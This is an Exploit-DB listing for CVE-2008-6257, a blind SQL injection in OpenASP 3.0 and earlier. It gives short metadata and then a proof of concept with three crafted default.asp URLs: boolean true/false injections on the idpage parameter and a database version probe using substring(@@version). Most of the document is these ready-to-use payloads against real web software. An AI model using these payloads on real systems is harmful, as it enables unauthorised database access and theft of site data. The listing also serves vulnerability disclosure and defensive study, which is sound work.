OpenASP <= 3.0 - Blind SQL Injection Vulnerability

2008-11-17T00:00:00
ID EDB-ID:7137
Type exploitdb
Reporter StAkeR
Modified 2008-11-17T00:00:00

Description

OpenASP. CVE-2008-6257. Webapps exploit for asp platform

                                        
                                            /*   
    OpenASP <= 3.0 Blind SQL Injection Vulnerability
    -----------------------------------------------------
    by athos - staker[at]hotmail[dot]it 
    thanks XaDoS,anyway i've found another sql injection 
    http://openasp.it
    -----------------------------------------------------
    
    default.asp?modulo=pages&idpage=1 or 1=1 (true)
    default.asp?modulo=pages&idpage=1 or 1=2 (false)
    default.asp?modulo=pages&idpage=-1 and substring(@@version,1,1)=4/*
    
*/

# milw0rm.com [2008-11-17]